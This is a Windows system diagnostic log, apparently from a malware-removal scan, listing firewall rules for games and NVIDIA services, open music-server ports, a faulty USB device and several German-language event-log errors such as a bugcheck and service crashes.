FirewallRules: [{F723C80F-371B-4A95-8F54-FA07E9E42973}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{3059C505-B8D3-418B-AC08-C874D15FA7DE}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [TCP Query User{3C48B5B3-18E3-4B84-A540-634DC83BA8B8}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [UDP Query User{B8D0287B-F1FE-4955-A6F8-D589CB7A01F5}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [{DB86E705-4890-40A5-853E-1F2EEC9DD046}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{C497194B-F1B8-4616-B08F-6951EFC5E468}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [TCP Query User{410E0639-1031-468E-8C0C-9B488EDB7278}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{0A39A2D1-3CAD-4DEE-BFD9-AD76B69202F7}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{ABF58F19-4D87-4BE8-A373-55D7E1D64B7A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E9500049-D9E9-4E8B-A598-216A386F8B2C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6B35CD45-1CCB-44FE-8E73-3326D85DEF6B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81BFC3EA-16DF-4E60-B196-7E489C7383B7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{81D600BE-5020-4F81-BFB0-4BF18DA2B05D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6E5A5B32-5FA5-4BC2-A041-480153DF1E83}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{6347001A-5F4B-4B99-BB7A-524AA41C0AD0}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{56D9A896-9B47-43D5-98CA-538A542BD200}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe
FirewallRules: [{D9FC3B0B-F50C-4BC2-BF3F-CDE2F2C9A290}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{5A1C6FA4-8139-4243-B3B8-47B3EFB3EA53}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{A213CF29-EB9C-4BFC-A988-0B1F4472789D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{D64B53D7-E8CD-40BD-9C91-72A20AD3970A}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe
FirewallRules: [{F2578368-AA70-433E-B35A-5009C86D1E17}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{9F5E0788-335F-42C1-A22C-50F7D9CDC79D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{32406C39-953C-460B-AFE6-CDE4B232D40D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{3EDA9F19-1F96-411E-8C1C-F563E58A3ADE}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [UDP Query User{68DEDDE0-6036-412F-AA44-08A74EE184D7}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{AE314296-B5C7-4DF4-9374-D088F3A08615}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{FDD2B1D2-8138-4DF1-B121-ED318FBA427B}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe
FirewallRules: [{29D2BACC-43CD-4803-B503-59899E87FD68}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [{FECFCD89-9DE5-49A3-B3A4-56AC70E40CD6}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe
FirewallRules: [TCP Query User{D8825ED6-64AE-45C5-B113-ECB7858A95CA}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [UDP Query User{7E395701-8E52-444C-8DA5-90B6FF036164}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{413FDA69-6273-4C65-BB74-8CE72A1CF6C4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [{9ADFBB2B-0B80-4A64-8FCB-571605B6D8A4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe
FirewallRules: [TCP Query User{A6D22F2F-32BB-4C44-8C74-EBDFE4627990}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [UDP Query User{E0FE8A20-C7CF-4897-B34B-C86C940403CA}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{EBFEFE2F-A517-416E-AB96-B57AFAF058B1}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{37DDA592-72D9-4843-B53B-828006F78A9A}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe
FirewallRules: [{7E09FB06-AEB8-47CD-B06C-2F012CFD67D8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{44C7FB35-3400-4EEB-A7E0-CAABCFA9010D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe
FirewallRules: [{2E30090F-BF18-4888-8C31-BDFB251C40AA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{1E06EE93-F65D-4232-8C20-FF047C2960B3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{CB8A9966-C9BA-4D24-8DCF-82CCC446AD7E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [{10D47C8E-1911-4379-B2A7-3DFAF5FECB49}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe
FirewallRules: [TCP Query User{AE697FDF-95CB-4742-AFE1-175E002D0CDD}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{21CEB7FC-0894-4127-82BF-6C74648C47A4}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [{922401B8-85D9-4FC4-B488-C575AD393F0E}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [{A0BED04D-77EC-44B5-A349-7E6248C82D08}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe
FirewallRules: [TCP Query User{6D865778-4B1C-48E3-8EDE-88B07DE0E8CE}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [UDP Query User{13FFCB9B-2BE1-472F-96CE-29F783837766}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe
FirewallRules: [{CB31CEEC-1545-42AA-9B71-7426B88BFB5E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [{61419720-4278-4910-BFAC-E93AF187E7DF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe
FirewallRules: [TCP Query User{9A8EDE9E-029B-47AF-A061-7525FEE74527}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [UDP Query User{9F7A08A0-4DBC-40F2-89AC-5BA6AA0CD90F}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{B00611DA-10FE-4A45-9987-D344F69AFE59}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [UDP Query User{3CE54E08-6C8E-4877-B238-A663ACEC403D}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe
FirewallRules: [TCP Query User{02FD6615-749C-459B-9329-E9D3D840FD87}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{0849F913-291A-4888-8D45-66C5704945BD}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{6D5C88B3-7D5E-4872-82F0-A3CB31A96B85}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5CB68C43-4C63-438F-98EB-749826872FBE}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [{75747872-239D-4591-85C3-EC5A1D6EC796}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{A5A856A7-452C-421E-A65C-1EB4C29A172C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{1508135B-998A-4813-8812-87AD3D57489A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{DA814E91-168A-465A-9266-00F76B832A69}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{4C6E3958-1227-48B4-A938-C23D7B034480}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{01193C79-C53E-4CB8-B7C2-5F0F8EC74B25}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe
FirewallRules: [{F72D0DCF-6A2B-4F0C-BBA7-0C8DD6BCC27F}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{A93DA08B-800F-4E4E-8BBB-368C93F6080A}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe
FirewallRules: [{D3231BE9-FB26-4B52-A06F-C76F95C54121}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{C17DA570-D7C5-4124-A736-398D9CEBB379}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe
FirewallRules: [{F87F2FB5-8593-4BFD-B2A9-A08FA335DB4D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DD2FEDAC-B152-4BA8-A685-87BB03D81555}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe
FirewallRules: [{DC75C909-CEA5-498F-B98D-A5FA3673F55B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{67EB36C9-7978-4E8B-B4E2-D789597F76F7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [TCP Query User{1B9BBC75-D6A3-451D-9402-7BF428C6B964}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{9F8F6E86-D511-4F2C-892D-703134694F63}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{8AF18EE4-FBC6-4D0A-BC4E-D3F149CDB2A9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{87EB15D3-94CF-4471-A526-5B82C235CB03}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe
FirewallRules: [{CA69E6B0-A279-4343-AF7A-0AF44A42D8DA}] => (Block) LPort=445
FirewallRules: [{E924BE7C-390D-4029-AF9F-F7E5005B87A0}] => (Block) LPort=445
FirewallRules: [{B3BD5C1D-80FD-4A00-BF14-9B9B1B4C9F15}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{38D2290F-C6D2-4166-A44D-3ECDEEA6A2AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [TCP Query User{50D16B60-67AB-488A-AE5C-E61D97824CA9}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [UDP Query User{19EF7346-06B2-43ED-8F39-A83414013D6C}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe
FirewallRules: [{6DB5B824-C375-4374-B640-5A46AE0D856B}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{2F010EF3-6120-4A95-B9C0-5CD981CCF542}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{09CB81DB-7550-4F7B-B023-18A4A3920F6B}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{692B4130-23BF-4C1F-96BC-5039D5E48ED4}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{C0A906DA-FAB3-4A93-97C7-F59B870BDFA1}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{BF2178FB-4544-451B-9B32-D5A4C31F4FCA}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe
FirewallRules: [{F37A5F7E-D189-4815-A302-2891EAFA783C}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe
FirewallRules: [{7C735814-90CD-4F3A-A051-211C0BBD9495}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe
FirewallRules: [{DAC4BDBD-6873-4C9D-A3D9-1CF7A9DBD691}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{D08800A7-21B0-4FDF-93DC-9BBF11F5F80E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{607765EA-BFDC-4528-857D-9DB7207FA061}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{9C65B7A2-4B3D-4E1D-98A3-4C2662F366C7}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe
FirewallRules: [{FEA59EF6-632E-4765-9BA8-17DBA601260E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{5B99B3A8-F2E7-4326-BBDD-FC046CAA57D7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe
FirewallRules: [{6AB67BB1-CE72-42C7-B1A7-686993AA20AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{AFFDAA2A-A01E-4601-9977-4EC518739200}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{064DE8B2-CDAB-4E65-AA20-4F44B1C38564}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{F30A19A3-5234-4E0D-8B86-B393932138B4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EA33863E-67CD-4843-A527-7077DE793E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{ED9892D6-6D9D-426F-97C9-38483F4C7806}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C6E60452-31A4-49DE-8FC4-6093529938F3}] => (Allow) C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe
FirewallRules: [{E76100CD-DE19-44E3-957C-3D5E4FCCDCC3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
DomainProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
DomainProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
DomainProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
DomainProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
DomainProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
DomainProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
DomainProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
DomainProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
DomainProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
DomainProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
DomainProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
DomainProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
DomainProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
DomainProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
DomainProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
DomainProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI)
StandardProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI)
StandardProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI)
StandardProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI)
StandardProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI)
StandardProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI)
StandardProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI)
StandardProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI)
StandardProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI)
StandardProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI)
StandardProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI)
StandardProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI)
StandardProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI)
StandardProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI)
StandardProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp
StandardProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp
StandardProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp

==================== Wiederherstellungspunkte =========================

09-08-2017 18:56:47 JRT Pre-Junkware Removal

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Description: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard-USB-Hostcontroller)
Service: 
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. 


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (08/09/2017 06:57:01 PM) (Source: ESENT) (EventID: 455) (User: )
Description: SettingSyncHost (8636) {7275B360-D16E-4A63-999E-C1E83CAE2702}: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Users\*****\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\edb0001C.log.

Error: (08/09/2017 06:55:36 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/09/2017 06:55:06 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/09/2017 06:33:11 PM) (Source: Windows Search Service) (EventID: 3079) (User: )
Description: Benachrichtigungen für Volume C:\ sind nicht aktiv. 

Kontext: Windows Anwendung

Details:
	Falscher Parameter.  (HRESULT : 0x80070057) (0x80070057)

Error: (08/08/2017 11:12:20 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/08/2017 11:09:20 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/08/2017 07:54:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe_AppReadiness, Version: 10.0.15063.0, Zeitstempel: 0x02799ef5
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.447, Zeitstempel: 0xa329d3a8
Ausnahmecode: 0xc0000374
Fehleroffset: 0x00000000000f775f
ID des fehlerhaften Prozesses: 0x14c0
Startzeit der fehlerhaften Anwendung: 0x01d3106f677803f8
Pfad der fehlerhaften Anwendung: c:\windows\system32\svchost.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: e32cdd45-cc09-4755-a884-1766a58cffdb
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (08/08/2017 07:28:21 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.

Error: (08/08/2017 06:00:39 PM) (Source: ESENT) (EventID: 455) (User: )
Description: SettingSyncHost (7672) {6A2B0A61-8ED9-4BCE-AD27-3A8AE10CACC4}: Fehler -1811 (0xfffff8ed) beim Öffnen von Protokolldatei C:\Users\*****\AppData\Local\Microsoft\Windows\SettingSync\metastore\edb00025.log.

Error: (08/08/2017 05:58:23 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.


Systemfehler:
=============
Error: (08/09/2017 06:56:58 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NVIDIA NetworkService Container" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (08/09/2017 06:56:58 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "NVIDIA LocalSystem Container" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 6000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (08/09/2017 06:56:56 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "NVIDIA Display Container LS" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (08/09/2017 06:42:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (08/09/2017 06:40:25 PM) (Source: BugCheck) (EventID: 1001) (User: )
Description: Der Computer wurde nach einem schwerwiegenden Fehler neu gestartet. Der Fehlercode war: 0x00000050 (0xffff8900bc3a2000, 0x0000000000000002, 0xfffff80318b0a846, 0x0000000000000000). Ein volles Abbild wurde gespeichert in: C:\WINDOWS\MEMORY.DMP. Berichts-ID: 7499a157-048c-4741-ae6b-42281a81fc43.

Error: (08/09/2017 06:40:24 PM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als
Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser
Konfiguration nicht gestartet zu sein.

Error: (08/09/2017 06:40:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.

Error: (08/09/2017 06:40:23 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am ‎08.‎08.‎2017 um 23:15:03 unerwartet heruntergefahren.

Error: (08/08/2017 11:15:06 PM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (08/08/2017 11:15:06 PM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


CodeIntegrity:
===================================
  Date: 2017-07-28 18:15:03.249
